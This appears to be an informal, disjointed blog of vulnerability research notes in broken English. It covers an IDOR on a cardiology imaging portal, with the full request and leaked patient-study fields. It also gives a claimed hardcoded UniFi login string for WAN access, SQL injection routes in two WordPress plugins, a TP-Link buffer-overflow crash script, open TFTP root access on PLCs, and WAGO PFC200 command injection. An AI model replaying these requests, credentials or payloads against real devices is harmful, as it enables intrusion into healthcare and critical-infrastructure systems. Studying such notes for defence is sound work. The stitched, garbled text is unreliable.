fun life is better than every money vulnerability research just for fun

i guess i screwed up lot of vulnerabilities so for now i dont have 1 dollar the new the newest bug i exploited is these the idor in the one of biggest programs i dont write the leak word in my report so its get informative and patched hmmm..

step1 – go to search bar and search dummy data step 2- change the filtertype to 1 to disable it

original request: 

GET /sdportal/StudyList/StudyListResult?source=Cardiology&server=server2&filterName=QuickSearch&filterType=0&search=alldays-admin&_search=false&nd=1719508416301&rows=50&page=1&sidx=StudyDate&sord=desc HTTP/1.1
Host: server1.domain.tld
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=1
Te: trailers
Connection: keep-alive

After that we respond to many data of users and employees like uid and gender and username etc... The interesting part of this story is the data of users that we read the data from server2 but access to server1 and send we do. request from server1 and we can read a lot of data that we don't have access to the server one if we search anything the response is [] but in here after disable the filter we have lot of data

      "StudyStatus": "UNREAD",
      "Reports": "",
      "PDFReports": "",
      "DiagnosingPhysician": [],
      "ReferringPhysician": null,
      "Diagnosis": "",
      "StudyLocation": "Online",
      "PriorStudies": 1,
      "Modality": "SRXA",
      "OriginalModality": "SRXA",
      "NumberOfImages": 12,
      "Indication": "",
      "Technologist": [],
      "Custom1": "",
      "Custom2": "",
      "ServerName": "server2",
      "Department": "Cardiology",
      "ReportUploadStatus": "",
      "MasterPatientId": null,
      "StudyPerformed": "",
      "UID": "uid user",
      "IsViewableInPir": true,
      "IsStudyLocked": false,
      "IsTrinityEnabled": false,
      "IsPDFReportAvailable": false,
      "Sex": "",
      "IsADTReconciled": false,
      "IsORMAssociated": false,
      "NumberOfConflicts": 0

after send we get informative

firmware format device version:BZ.MT7622_6.6.55+15189.231127.1104 type:unifi u6 lr

in binary blebrd we can see lot of parameter handlers and after get some search we can see the parameter def-password,def-username after some search we can see the controlled params for default credential use hardcoded password and user name to get access to device

in these part for def-username we can see the param2 defined and after that the def-username use the param2 offset to get data these is also for def-password like these .

the blebrd is the web server of the unifi device

so we can login into all devices from wan and get access to them:) with json or like these for example def-password=D_DpOT0_EUlDpOT_E_& def-username=D_DpOT0_EUlDpOT_E_

        00458140    cbz        param_1 ,LAB_00458178
        00458144    adrp       param_2 ,s_D_DpOT0_EUlDpOT_E__00565f58+168       = "D_DpOT0_EUlDpOT_E_"
        00458148     add        param_2 =>s_def-username_00566902 ,param_2 ,#0x902 = "def-username"
        0045814c     mov        param_1 ,x21

so much fun

plugin wpforo 2.3.4 is vulnerable to sql injection these I need to inject sql in some plugins, so I am working on these plugins, also the last post I made is that both of them are sql injection and they solve my project, so I will start after a little I am looking for this CVE-2024-3200. But I have to say that I didn't see this vulnerability after working on that authentication and start working so after finishing working on this cve I started working on html5 video player last cve sql injection

but lets analyses these vulnerability

after so much check and read how it work i see these so much fun

in file boards.php –> line: 289 after see i search what do the boards.php i search on guide of the plugin and see these :(

so after that i see these is authenticated

To create a new board, you should navigate in Dashboard to wpForo > Boards admin page and click the [Add new] button: Fill and select your preferred values for following fields: Board Title: The new discussion board title which will be displayed on the forum header section. 

so the parameters we can execute the sql query is them slug params in the description sluginclude and slugexclude

so much fun

after these the parameter of args is append to $sql var and execute

After analyzing the plugin and understanding how it works and how it differs, I see some interesting things in this file:

wp-content/plugins/html5-video-player/inc/Rest/VideoController.php the diff of thes patch

So in this function we can see that the attacker can escape in the sql str and does not need to do anything like add ecape chars or bypass anything

and here we can see the vulnerable route /wp-json/h5vp/v1/video/

sql injection

so we know anything we need to know :) also the request method is post and the vulnerable parameter is “id”

request is these:

$request = array( 'method' => 'POST', 'body' => $params, 'timeout' => 60, );

also i see some xss patches in these plugin in the version 2.5.26 of these plugin

If someone asks me what do you think about air gap networks, I will answer that this is a very good way to increase network security. But if they say that it cannot be hacked at all, I will show them this sample and articles along with the source code.

an example struct to get am 1580 khz frequency from bus cpu to dest with that structure and use the time palse of cpu to send it over the airgapped network.

hmm we can do these with some function like the hostgetclock_service

One day when I was really bored, I told my friends to send me the models and types of routers and iot devices they have so that I can send them an example of vulnerabilities. In the meantime, they said the name of this device is tp-link

In the first part, I went to /etc to check the entries so that I can get through it the type of input data of the interfaces and things like this. The best parts that are really interesting for us to develop the exploit are ppp and pppoe and also l2tp and so on. http are for this part In this part I went to httpd which is a custom web server to start with

Cosmic radiation

In the above image, I saw io, which is the input and output controller, which is referenced to several functions that you see

Cosmic radiation

The function searches for different paths and returns 404 if there is none

Cosmic radiation

the interesting route

The input is parsed from the http header side on the

Cosmic radiation

vulnerable function: httprpmauth_main

vulnerability : if (param1[0xd] == 1) { pcVar3 = “adminName=%s\nadminPwd=%s\n”; } else { pcVar3 = “userName=%s\nuserPwd=%s\n”; } sprintf(acStack1fbc,pcVar3); iVar1 = rdpsetObj(0,“USERCFG”,&local1fec,acStack1fbc,2);

these one is realte show me get header requests parameters and copy it to stack with sprintf after that i nee know which route get input to it so i guss maybe these function xref to him route

httpaliasaddEntryByArg(2,“/cgi/auth”,(char *)0x0,(int)httprpmauthmain,ghttpauthordefault); the param1 is int i dont have any idea what these do so i need analyse these function param2 is route param3 is 0x0 param4 call the function to get parameters of header requests param_5 may be these is an default parameter set by device

so in these route we can use these parameters of http header to get overflow?

import requests headers = {“Host”: “”, “User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “/”,“Accept-Language”: “en-US,en;q=0.5”, “Accept-Encoding”: “gzip, deflate”,“Content-Type”: “text/plain”, “Content-Length”: “78”,“Origin”: “", “Connection”: “close”, “Referer”: “"}

may be these payload = “a” * 2048 formdata = “[/cgi/auth#0,0,0,0,0,0#0,0,0,0,0,0]0,userName={}nuserPwd=1231313”.format(payload) url = “" response = requests.post(url, data=formdata, headers=headers) print response.text

if doesn't work change the parameters to true one of them and test it to get crash so we can exploit it like that

i guss some day i wanna research about the some plc devices and i see these device on the shodan hmmm... i dont know anything about it soooo i download the software and firmware from site and start research hmm

and i see these Cosmic radiation

the tftp port on it is default open why? hmm so i check these on the some critical devices and i see these bruh we can access the root on these

and we can access to device after i see that i think to my self i have zero day ? but to day i see these vulnerability be patched as these cve CVE-2019–9201

these vulnerability like the shell access port open without any credentials :/

to day i explain how we can exploit the command injection vulnerability in wago pfc200 firmware.

the command injection is vulnerability to allow attacker  to output its own commands at the device and access to it.

vulnerability is  on these directory: pfc200/var/www/wbm/php

and filename is :session_lifetime.inc.php

these function sent request is responsible for checking the username parameter in the ID session each time PHPSESS .

we cant injecting the command on the session just we need the check these function where be use on the web server and inject our own command for fun :)

Cosmic radiation

In order to give them a little more time, I will not publish this yet (i talk about poc and other stuff like that)

so these is realy shity command injection on these function :/

why you use these ?

I have reported it but still no response after 1 week also i have 2 other vulnerability on the iocheckd service but i dont like to report it

these is wan side vulnerability and these device is use realy critical infrastructure